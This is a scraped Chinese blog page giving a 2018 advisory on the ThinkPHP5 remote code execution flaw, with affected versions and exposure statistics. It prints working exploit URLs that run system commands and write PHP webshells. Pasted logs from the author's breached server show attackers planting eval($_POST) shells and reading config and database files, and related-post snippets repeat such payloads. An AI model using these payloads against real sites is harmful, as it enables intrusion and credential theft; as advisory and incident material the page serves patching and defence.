php/5.2.17漏洞,【漏洞预警】ThinkPHP5远程代码执行漏洞

最新推荐文章于 2024-03-07 12:51:27 发布
VIP文章 最新推荐文章于 2024-03-07 12:51:27 发布
阅读量1.2k 收藏 1
点赞数
文章标签: php/5.2.17漏洞

2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。

此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞,其框架安全性可能会在日后遭受更严峻的考验。据不完全统计,目前全球使用ThinkPHP5及其二次开发系统的网站大概12万。

概况

ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

目前FOFA系统最新数据(一年内数据)显示全球范围内共有 21万个ThinkPHP网站对外开放服务。中国大陆地区使用数量最多,共有113339台,美国第二,共有37011台,中国香港特别行政区第三,共有12262台,新加坡第四,共有3829台。

全球范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)

危害等级

严重

漏洞影响

目前漏洞影响版本号包括:

5.x < 5.1.31

5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响

AdminLTE后台管理系统

layui后台管理系统

thinkcmf

H-ui.admin后台管理系统

tpshop

FsatAdmin

eyoucms

LarryCMS后台管理系统

tpadmin后台管理系统

snake后台管理系统

ThinkSNS

DolphinPHP后台管理系统

WeMall商城系统

CLTPHP

齐博CMS

DSMALL

YFCMF

HisiPHP后台管理系统

Tplay后台管理系统

lyadmin后台管理系统

haoid后台管理系统

场景还原

5.0.x版本

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.1.x版本

s=index/\think\Request/input&filter=phpinfo&data=1s=index/\think\Request/input&filter=system&data=ids=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3Es=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3Es=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

今天刚看到这个问题 赶紧检查下我们自己的服务器 发现被人打包文件了 哪他妈的有这么巧的事

妈蛋 很骚的操作 直接在上面ls 一通 tar 拷贝 cp移动 打包

瞬间千万个草泥马奔腾

172.68.142.86- - [11/Dec/2018:20:36:19+0800]"GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"200275172.68.142.86- - [11/Dec/2018:20:36:19+0800]"GET /?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"200275162.158.58.6- - [12/Dec/2018:14:46:36+0800]"GET /trade/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1"20013173.245.48.60- - [12/Dec/2018:15:45:33+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C?php%20eval($_POST[%273a%27])?%3E HTTP/1.1"2002173.245.48.60- - [12/Dec/2018:15:46:12+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=0x7e HTTP/1.1"2001173.245.48.60- - [12/Dec/2018:15:46:43+0800]"GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C%3Fphp%20eval%28%24_POST%5B%273a%27%5D%29%3B%3F%3E HTTP/1.1"2002172.68.255.53- - [12/Dec/2018:17:24:08+0800]"GET /trade//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1"50058918172.68.255.53- - [12/Dec/2018:17:25:19+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001139172.68.255.53- - [12/Dec/2018:17:32:43+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001139172.68.255.53- - [12/Dec/2018:17:32:50+0800]"GET /trade/%3fs%3d%2findex%2f%5cthink%5capp%2finvokefunction%26function%3dcall_user_func_array%26vars%5b0%5d%3dfile_put_contents%26vars%5b1%5d%5b%5d%3dinfo.php%26vars%5b1%5d%5b%5d%3d%3c%3fphp+eval(%24_POST%5bcmd%5d%3b%3f%3e HTTP/1.1"404372172.68.255.53- - [12/Dec/2018:17:33:46+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1"2002172.68.255.53- - [12/Dec/2018:17:34:38+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1"2002172.68.255.5- - [12/Dec/2018:17:41:31+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1"2001199162.158.179.175- - [12/Dec/2018:17:43:57+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1"200171162.158.179.175- - [12/Dec/2018:17:44:16+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20uploadold HTTP/1.1"2001288162.158.179.175- - [12/Dec/2018:17:44:26+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1"200172162.158.179.175- - [12/Dec/2018:17:44:46+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1"20049162.158.179.175- - [12/Dec/2018:17:44:56+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1"2002688162.158.178.36- - [12/Dec/2018:17:55:30+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1"20049162.158.178.36- - [12/Dec/2018:17:55:39+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1"200172162.158.178.36- - [12/Dec/2018:17:55:52+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/config.php HTTP/1.1"20045162.158.178.36- - [12/Dec/2018:17:56:00+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/config.php HTTP/1.1"20010130162.158.179.19- - [12/Dec/2018:18:04:31+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:04:37+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:04:41+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20root/db_back HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:05:00+0800]"GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/./root/db_back/ HTTP/1.1"200-162.158.179.19- - [12/Dec/2018:18:05:09+0800]"GET /trade/?s=/index/\\think\\a

最低0.47元/天 解锁文章
铭信
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy php5.2.17nts 下载
11-08
php5.2.17nts 下载
phpstudy php5.2.17nts版本
09-29
phpstudy php5.2.17nts版本 直接解压至phpstudy下的\Extensions\php目录
thinkphp5框架漏洞
m0_74196038的博客
03-07 963
ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的这个poc是通过post方法提交的,然后url当中还是要提交?s=captcha特殊url编码之后的POC。
tplay:Tplay是一款基于ThinkPHP5 + Layui2 + Mysql开发的后台管理框架,PHP版本要求提升到5.5,Tplay集成了一般应用所必须的功能模块,为开发者减少重复性的工作,提升开发速度,规范团队开发模式。————记得star哦
04-29
Tplay 1.3.5 更新说明: 鉴于有个别朋友反馈thinkphp5.0.23存在远程命令执行漏洞,特做此次更新,这应该是Tplay最后一次更新。 1.ThinkPHP版本更新至v5.0.24 2.Layui版本更新至2.6.4 Tplay 1.3.4 更新说明: 1.ThinkPHP版本更新至v5.0.23 2.修复部分模板会报“模板文件不存在”错误的BUG。 3.调整自定义分页类的位置为app目录下,方便开发者后续直接覆盖升级thinkphp目录 Tplay 1.3.3 更新说明: 这次更新主要是填上个版本搞出来的小坑,如果自行修复过的可以不升级 1.修复部分css加载不到的错误 2.修复左侧菜单相关js报错的问题 3.调整目录结构(上个版本精简了目录,但有同学反映会影响使用,固调整回来) 4.现在当你展开一个二级菜单时,其他的二级菜单也会闭合了 5.微调控制台的布局 Tplay
解决cPanel无法安装php5.2.17
12-19
1. 准备cpanel专供php # cd /var/cpanel/easy/apache/custom_opt_mods # wget http://docs.cpanel.net/twiki/pub/EasyApache/EasyApacheCustomModules/custom_opt_mod-PHP5217.tar.gz # tar -xzvf custom_opt_mod-PHP5217.tar.gz 2. 通过easyApache重装 搜索easyApache,然后一步步看图。 easyApache cPanel安装php5.2.17 cPanel安装php5.2.17
php5.2.17nts
最新发布
03-24
由于无法在线下载,出现网络错误 phpstudy php5.2.17nts版本 直接解压至phpstudy下的\Extensions\php目录 修改5.2.17ntf目录下的php.ini文件 里面有两处路径需要修改 extension_dir="D:\soft\phpstudy_pro\Extensions\php\php5.2.17nts\ext" error_log=D:/soft/phpstudy_pro/Extensions/php/php5.2.17nts.log 修改为自身存储路径,重启apache并切换php版本
Nginx-文件解析漏洞
weixin_45095113的博客
07-30 3149
关于Nginx服务器的一些漏洞-文件解析漏洞
java invokefunction,JAVA对角本Javascript用法举例
weixin_35041325的博客
03-10 1068
Java scripting工具包提供了java可以访问其他语言脚本的能力,脚本片段将会在运行时编译成中间代码(字节码),并能够被java scripting引擎调用。在某些场景下,很有用。在javax.script包中有很多的类,但这些类中最主要的是ScriptEngineManager。1. 简单调用/*** simple,默认java.*包中的API已经倒入到engine中。你可以使用那些A...
php5.2.17解析漏洞,apache 解析漏洞(CVE-2017-15715)
weixin_30008295的博客
03-24 2230
在p牛博客最近更新的文章,传送门,感觉很有意思,自己在自己本地测试了一下0x01 正则表达式中的 ‘$’apache这次解析漏洞的根本原因就是这个$,正则表达式中,我们都知道$用来匹配字符串结尾位置,我们来看看菜鸟教程中对正则表达符$的解释:匹配输入字符串的结尾位置。如果设置了 RegExp 对象的 Multiline 属性,则 $ 也匹配 ‘\n’ 或 ‘\r’。要匹配 $ 字符本身,请使用 ...
php/5.2.17漏洞,漏洞预警 | ThinkPHP5远程命令执行漏洞
weixin_35523284的博客
03-12 798
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。前言ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多。2019年1月11日ThinkPHP团队发布了版本更新,本次更新包含了一个可能GetShell的安全更新,具体内容为改...
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6587
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
H-ui.admin_v2.5bootstrap管理后台源码
06-09
该源码是H-ui.admin_v2.5bootstrap管理后台源码,需要H-ui的赶紧下载了。
UPUPW APACHE PHP5.2.17经典珍藏版
11-27
UPUPW Apache PHP5.2.17系列 一直有着省内存、速度快、运行稳定、服务器架设率高等良好口碑,本次更新全面重构所有内核更突显便捷与稳健,命名为经典珍藏版。 PHP5.2.17经典珍藏版修改和
ThinkPHP v5.0.22 远程代码漏洞复现分析
ArrowQin的博客
05-04 2747
漏洞描述 漏洞类型:远程代码执行漏洞 POC:?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir ?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1 环...
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1029
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
ThinkPHP漏洞利用
weixin_41038905的博客
10-11 1460
漏洞标志 影响版本 ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 漏洞利用 先查看版本号。在网址上随意输入一个不存在的模块 地址: 可以看到,thinkphp 版本为 5.0.20 查看信息 漏洞利用 大致原理: 漏洞程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 详情参考:https://www.cnblogs.com/backlion/p/10106676.html 初步利用代码如下: index.php?s..
ThinkPHP5远程代码执行漏洞复现
m0_67325632的博客
07-07 783
漏洞概述:由于框架对控制器名称未能进行充分的检测,攻击者可以利用这个漏洞对网站进行rce 漏洞复现: 第一步,载入靶场 这里使用的的插件为HackBar 这是一款他的功能类似于地址栏,但是它的数据不受服务器的响应触发的重定向等其他影响 第二部,非法传参调用函数,再通过数组拆分传入函数参数 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&var...
php远程读写漏洞利用,ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析
weixin_28744613的博客
04-11 845
0x01 漏洞利用方式5.0版本POC(不唯一)命令执行:?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[系统命令]文件写入:?s=index/\think\app/invokefunction&function=call_user_...
ThinkPHP 5命令执行漏洞复现
Atkx's Blog
02-09 692
漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 漏洞描述 Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变
phpstudy后门漏洞复现
09-06
根据引用中的信息,实际测试发现phpstudy2016版PHP5.4、phpstudy2018版php-5.2.17php-5.4.45均存在后门漏洞。 根据引用中的信息,后门代码存在于\ext\php_xmlrpc.dll模块中。通过使用notepad打开该文件并搜索@eval,如果文件中存在@eval(%s(‘%s’)),则证明漏洞存在。 根据引用中的信息,修复漏洞的方法之一是从PHP官网下载原始的php-5.4.45版本或php-5.2.17版本,并替换其中的php_xmlrpc.dll文件。你可以从以下链接下载原始版本的PHP:https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip 另外,你也可以从官网下载更新最新的phpstudy软件来修复后门漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [phpstudy后门预警漏洞复现](https://blog.csdn.net/weixin_43886632/article/details/101294081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值